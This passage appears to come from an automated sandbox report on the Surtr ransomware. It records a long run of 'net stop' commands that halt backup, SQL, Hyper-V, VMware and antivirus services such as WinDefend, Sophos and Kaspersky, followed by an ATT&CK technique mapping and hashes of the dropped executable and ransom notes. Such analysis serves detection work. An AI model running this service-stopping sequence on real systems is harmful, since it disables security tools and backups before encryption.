PID:1548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamBrokerSvc"
5⤵
PID:3180

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
3⤵
PID:108

C:\Windows\system32\net.exe
net stop "VeeamCatalogSvc"
4⤵
PID:3204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamCatalogSvc"
5⤵
PID:3244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
3⤵
PID:592

C:\Windows\system32\net.exe
net stop "VeeamCloudSvc"
4⤵
PID:1636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamCloudSvc"
5⤵
PID:3196

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
3⤵
PID:1820

C:\Windows\system32\net.exe
net stop "VeeamDeploymentService"
4⤵
PID:1792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamDeploymentService"
5⤵
PID:3260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
3⤵
PID:812

C:\Windows\system32\net.exe
net stop "VeeamDeploySvc"
4⤵
PID:3272

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamDeploySvc"
5⤵
PID:852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
3⤵
PID:3276

C:\Windows\system32\net.exe
net stop "VeeamEnterpriseManagerSvc"
4⤵
PID:1804

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
5⤵
PID:3248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
3⤵
PID:3212

C:\Windows\system32\net.exe
net stop "VeeamMountSvc"
4⤵
PID:2956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamMountSvc"
5⤵
PID:628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
3⤵
PID:1744

C:\Windows\system32\net.exe
net stop "VeeamNFSSvc"
4⤵
PID:1076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamNFSSvc"
5⤵
PID:3236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
3⤵
PID:2828

C:\Windows\system32\net.exe
net stop "VeeamRESTSvc"
4⤵
PID:2948

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamRESTSvc"
5⤵
PID:1108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
3⤵
PID:3292

C:\Windows\system32\net.exe
net stop "VeeamTransportSvc"
4⤵
PID:3264

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamTransportSvc"
5⤵
PID:3300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "W3Svc"
3⤵
PID:1252

C:\Windows\system32\net.exe
net stop "W3Svc"
4⤵
PID:2592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "W3Svc"
5⤵
PID:3008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "wbengine"
3⤵
PID:3332

C:\Windows\system32\net.exe
net stop "wbengine"
4⤵
PID:2552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine"
5⤵
PID:3068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "WRSVC"
3⤵
PID:2160

C:\Windows\system32\net.exe
net stop "WRSVC"
4⤵
PID:3336

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WRSVC"
5⤵
PID:2380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
3⤵
PID:2532

C:\Windows\system32\net.exe
net stop "MSSQL$VEEAMSQL2008R2"
4⤵
PID:3340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
5⤵
PID:2268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
3⤵
PID:2332

C:\Windows\system32\net.exe
net stop "SQLAgent$VEEAMSQL2008R2"
4⤵
PID:2516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
5⤵
PID:3348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
3⤵
PID:3064

C:\Windows\system32\net.exe
net stop "VeeamHvIntegrationSvc"
4⤵
PID:3344

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
5⤵
PID:3352

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "swi_update"
3⤵
PID:2276

C:\Windows\system32\net.exe
net stop "swi_update"
4⤵
PID:2076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "swi_update"
5⤵
PID:2244

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
3⤵
PID:1228

C:\Windows\system32\net.exe
net stop "SQLAgent$CXDB"
4⤵
PID:1064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$CXDB"
5⤵
PID:1340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
3⤵
PID:1480

C:\Windows\system32\net.exe
net stop "SQLAgent$CITRIX_METAFRAME"
4⤵
PID:2960

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
5⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
3⤵
PID:3396

C:\Windows\system32\net.exe
net stop "SQL Backups"
4⤵
PID:2472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQL Backups"
5⤵
PID:2548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
3⤵
PID:2284

C:\Windows\system32\net.exe
net stop "MSSQL$PROD"
4⤵
PID:992

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PROD"
5⤵
PID:3404

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
3⤵
PID:1824

C:\Windows\system32\net.exe
net stop "Zoolz 2 Service"
4⤵
PID:2248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Zoolz 2 Service"
5⤵
PID:2784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
3⤵
PID:3420

C:\Windows\system32\net.exe
net stop "MSSQLServerADHelper"
4⤵
PID:2844

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLServerADHelper"
5⤵
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
3⤵
PID:1156

C:\Windows\system32\net.exe
net stop "SQLAgent$PROD"
4⤵
PID:2144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$PROD"
5⤵
PID:3368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
3⤵
PID:428

C:\Windows\system32\net.exe
net stop "msftesql$PROD"
4⤵
PID:2256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "msftesql$PROD"
5⤵
PID:2036

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
3⤵
PID:568

C:\Windows\system32\net.exe
net stop "NetMsmqActivator"
4⤵
PID:1452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator"
5⤵
PID:1892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
3⤵
PID:520

C:\Windows\system32\net.exe
net stop "EhttpSrv"
4⤵
PID:2068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "EhttpSrv"
5⤵
PID:2236

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ekrn"
3⤵
PID:468

C:\Windows\system32\net.exe
net stop "ekrn"
4⤵
PID:1628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ekrn"
5⤵
PID:2116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
3⤵
PID:1048

C:\Windows\system32\net.exe
net stop "ESHASRV"
4⤵
PID:2372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ESHASRV"
5⤵
PID:1604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
3⤵
PID:2216

C:\Windows\system32\net.exe
net stop "MSSQL$SOPHOS"
4⤵
PID:3480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
5⤵
PID:1008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
3⤵
PID:1924

C:\Windows\system32\net.exe
net stop "SQLAgent$SOPHOS"
4⤵
PID:3496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
5⤵
PID:3472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "AVP"
3⤵
PID:3500

C:\Windows\system32\net.exe
net stop "AVP"
4⤵
PID:220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "AVP"
5⤵
PID:208

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "klnagent"
3⤵
PID:236

C:\Windows\system32\net.exe
net stop "klnagent"
4⤵
PID:224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "klnagent"
5⤵
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
3⤵
PID:3540

C:\Windows\system32\net.exe
net stop "MSSQL$SQLEXPRESS"
4⤵
PID:3580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
5⤵
PID:2088

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
3⤵
PID:2912

C:\Windows\system32\net.exe
net stop "SQLAgent$SQLEXPRESS"
4⤵
PID:2704

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
5⤵
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "wbengine"
3⤵
PID:3596

C:\Windows\system32\net.exe
net stop "wbengine"
4⤵
PID:3676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine"
5⤵
PID:3708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "HvHost"
3⤵
PID:3668

C:\Windows\system32\net.exe
net stop "HvHost"
4⤵
PID:3684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "HvHost"
5⤵
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
3⤵
PID:3700

C:\Windows\system32\net.exe
net stop "vmickvpexchange"
4⤵
PID:3740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmickvpexchange"
5⤵
PID:3604

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
3⤵
PID:3620

C:\Windows\system32\net.exe
net stop "vmicguestinterface"
4⤵
PID:532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicguestinterface"
5⤵
PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
3⤵
PID:3764

C:\Windows\system32\net.exe
net stop "vmicshutdown"
4⤵
PID:3768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicshutdown"
5⤵
PID:3784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
3⤵
PID:3776

C:\Windows\system32\net.exe
net stop "vmicheartbeat"
4⤵
PID:3788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicheartbeat"
5⤵
PID:3796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmcompute"
3⤵
PID:3820

C:\Windows\system32\net.exe
net stop "vmcompute"
4⤵
PID:3908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmcompute"
5⤵
PID:3832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
3⤵
PID:3880

C:\Windows\system32\net.exe
net stop "vmicvmsession"
4⤵
PID:3916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvmsession"
5⤵
PID:3972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
3⤵
PID:3928

C:\Windows\system32\net.exe
net stop "vmicrdv"
4⤵
PID:3944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicrdv"
5⤵
PID:3892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
3⤵
PID:3984

C:\Windows\system32\net.exe
net stop "vmictimesync"
4⤵
PID:3968

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmictimesync"
5⤵
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "vmicvss"
3⤵
PID:4000

C:\Windows\system32\net.exe
net stop "vmicvss"
4⤵
PID:3952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss"
5⤵
PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
3⤵
PID:3960

C:\Windows\system32\net.exe
net stop "VMAuthdService"
4⤵
PID:4048

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMAuthdService"
5⤵
PID:4064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
3⤵
PID:4020

C:\Windows\system32\net.exe
net stop "VMnetDHCP"
4⤵
PID:4084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMnetDHCP"
5⤵
PID:4072

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
3⤵
PID:3084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
3⤵
PID:2616

C:\Windows\system32\net.exe
net stop "VMUSBArbService"
4⤵
PID:2860

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMUSBArbService"
5⤵
PID:3100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
3⤵
PID:3120

C:\Windows\system32\net.exe
net stop "VMwareHostd"
4⤵
PID:3108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VMwareHostd"
5⤵
PID:2908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "Sense"
3⤵
PID:3124

C:\Windows\system32\net.exe
net stop "Sense"
4⤵
PID:2776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sense"
5⤵
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
3⤵
PID:2664

C:\Windows\system32\net.exe
net stop "WdNisSvc"
4⤵
PID:2124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WdNisSvc"
5⤵
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "WinDefend"
3⤵
PID:1668

C:\Windows\system32\net.exe
net stop "WinDefend"
4⤵
PID:2192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
5⤵
PID:3080

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680

C:\Windows\system32\net.exe
net stop "Sophos MCS Client"
1⤵
PID:3056

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos MCS Client"
2⤵
PID:848

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k swprv
1⤵
PID:3000

C:\Windows\system32\net.exe
net stop "MSSQL$SBSMONITORING"
1⤵
PID:2536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT"
1⤵
PID:2336

C:\Windows\system32\net.exe
net stop "MSSQL$PROFXENGAGEMENT"
1⤵
PID:2136

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$SQL_2008"
1⤵
PID:2340

C:\Windows\system32\net.exe
net stop "MSSQL$SQL_2008"
1⤵
PID:2148

C:\Windows\system32\net.exe
net stop "MSSQL$TPSAMA"
1⤵
PID:2252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$TPSAMA"
2⤵
PID:1716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQL$TPS"
1⤵
PID:2312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MSSQLFDLauncher"
1⤵
PID:1912

C:\Windows\system32\net.exe
net stop "MSSQLFDLauncher"
1⤵
PID:2972

C:\Windows\system32\net.exe
net stop "SQLAgent$SHAREPOINT"
1⤵
PID:4072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
2⤵
PID:4084

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Indicator Removal on Host

T1070

File Deletion

T1107

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
Filesize
8KB

MD5
c3df410a4e482aedc4f65be42d97daff

SHA1
8602bbe25e87df92110732ccadda2d96eb82f4cf

SHA256
18452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a

SHA512
614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt
Filesize
621B

MD5
4c97b7389e84da2773ccb3443c234ae1

SHA1
7c66be6a0632a44ac2017e6e1bbd8f29809b61e2

SHA256
2d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058

SHA512
c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\ProgramData\Service\ID_DATA.surt
Filesize
14B

MD5
a400ab7041049318608e1a9271e99d16

SHA1
8898c1fc86590b8f2ec053a525e9f823b89c9c31

SHA256
60765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64

SHA512
95753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76

Download Submit
C:\ProgramData\Service\Private_DATA.surt
Filesize
1KB

MD5
a6d8b309d8fc19204b5bacccd10a3b23

SHA1
1fd075ce4724b9ef845da309bd34446ebea07670

SHA256
4fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c

SHA512
ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d

Download Submit
C:\ProgramData\Service\Public_DATA.surt
Filesize
204B

MD5
d501698a84bcbbeeda66a16073474c28

SHA1
a6da3c4b1cfeae541ed33cb0186309a25a6e1faf

SHA256
cbc140aa79c5a1a92a40be7292312536d2f705fcb56ee4417231485f475b161e

SHA512
a60f77cbeb221a938ea72c8fa5e702d4ae0c275845cd81a752a0e98e8772eecd95bc46b136a506fbd47a1bceebe502805d4ac08d26fa231ad3180dd4ad4a3ad7

Download Submit
C:\ProgramData\Service\SURTR_README.hta
Filesize
8KB

MD5
c3df410a4e482aedc4f65be42d97daff

SHA1
8602bbe25e87df92110732ccadda2d96eb82f4cf

SHA256
18452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a

SHA512
614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725

Download Submit
C:\ProgramData\Service\SURTR_README.txt
Filesize
621B

MD5
4c97b7389e84da2773ccb3443c234ae1

SHA1
7c66be6a0632a44ac2017e6e1bbd8f29809b61e2

SHA256
2d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058

SHA512
c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620

Download Submit
C:\ProgramData\Service\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\ProgramData\Service\SurtrBackGround.jpg
Filesize
30KB

MD5
33f7fc301be9d39fcb474fb8b1e5f42e

SHA1
a3bf9ddb2ac53bc4b12b249825189a7c7a07b766

SHA256
99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03

SHA512
6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

Download Submit
C:\ProgramData\Service\SurtrIcon.ico
Filesize
78KB

MD5
3257eb22824b57fe3d58074bca3128d3

SHA1
6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97

SHA256
5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad

SHA512
7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surt
Filesize
14B

MD5
a400ab7041049318608e1a9271e99d16

SHA1
8898c1fc86590b8f2ec053a525e9f823b89c9c31

SHA256
60765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64

SHA512
95753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surt
Filesize
1KB

MD5
a6d8b309d8fc19204b5bacccd10a3b23

SHA1
1fd075ce4724b9ef845da309bd34446ebea07670

SHA256
4fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c

SHA512
ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.hta
Filesize
8KB

MD5
c3df410a4e482aedc4f65be42d97daff

SHA1
8602bbe25e87df92110732ccadda2d96eb82f4cf

SHA256
18452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a

SHA512
614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe
Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
memory/108-111-0x0000000000000000-mapping.dmp

Download
memory/360-65-0x0000000000000000-mapping.dmp

Download
memory/416-71-0x0000000000000000-mapping.dmp

Download
memory/468-63-0x0000000000000000-mapping.dmp

Download
memory/524-64-0x0000000000000000-mapping.dmp

Download
memory/532-102-0x0000000000000000-mapping.dmp

Download
memory/544-89-0x0000000000000000-mapping.dmp

Download
memory/556-104-0x0000000000000000-mapping.dmp

Download
memory/592-82-0x0000000000000000-mapping.dmp

Download
memory/736-66-0x0000000000000000-mapping.dmp

Download
memory/760-99-0x0000000000000000-mapping.dmp

Download
memory/776-98-0x0000000000000000-mapping.dmp

Download
memory/792-107-0x0000000000000000-mapping.dmp

Download
memory/812-86-0x0000000000000000-mapping.dmp

Download
memory/816-103-0x0000000000000000-mapping.dmp

Download
memory/868-110-0x0000000000000000-mapping.dmp

Download
memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-55-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-60-0x0000000140133F50-mapping.dmp

Download
memory/992-80-0x0000000000000000-mapping.dmp

Download
memory/1012-101-0x0000000000000000-mapping.dmp

Download
memory/1056-106-0x0000000000000000-mapping.dmp

Download
memory/1200-78-0x0000000000000000-mapping.dmp

Download
memory/1228-67-0x0000000000000000-mapping.dmp

Download
memory/1356-69-0x0000000000000000-mapping.dmp

Download
memory/1388-93-0x0000000000000000-mapping.dmp

Download
memory/1408-88-0x0000000000000000-mapping.dmp

Download
memory/1448-97-0x0000000000000000-mapping.dmp

Download
memory/1460-105-0x0000000000000000-mapping.dmp

Download
memory/1468-73-0x0000000000000000-mapping.dmp

Download
memory/1476-75-0x0000000000000000-mapping.dmp

Download
memory/1480-115-0x0000000000000000-mapping.dmp

Download
memory/1484-74-0x0000000000000000-mapping.dmp

Download
memory/1500-77-0x0000000000000000-mapping.dmp

Download
memory/1532-94-0x0000000000000000-mapping.dmp

Download
memory/1552-92-0x0000000000000000-mapping.dmp

Download
memory/1580-96-0x0000000000000000-mapping.dmp

Download
memory/1608-95-0x0000000000000000-mapping.dmp

Download
memory/1636-87-0x0000000000000000-mapping.dmp

Download
memory/1640-72-0x0000000000000000-mapping.dmp

Download
memory/1676-117-0x0000000000000000-mapping.dmp

Download
memory/1716-91-0x0000000000000000-mapping.dmp

Download
memory/1728-83-0x0000000000000000-mapping.dmp

Download
memory/1736-81-0x0000000000000000-mapping.dmp

Download
memory/1752-108-0x0000000000000000-mapping.dmp

Download
memory/1756-84-0x0000000000000000-mapping.dmp

Download
memory/1772-100-0x0000000000000000-mapping.dmp

Download
memory/1784-68-0x0000000000000000-mapping.dmp

Download
memory/1812-70-0x0000000000000000-mapping.dmp

Download
memory/1824-79-0x0000000000000000-mapping.dmp

Download
memory/1860-76-0x0000000000000000-mapping.dmp

Download
memory/1888-90-0x0000000000000000-mapping.dmp

Download
memory/1900-109-0x0000000000000000-mapping.dmp

Download
memory/1912-113-0x0000000000000000-mapping.dmp

Download
memory/1944-85-0x0000000000000000-mapping.dmp

Download
memory/1988-112-0x0000000000000000-mapping.dmp

Download
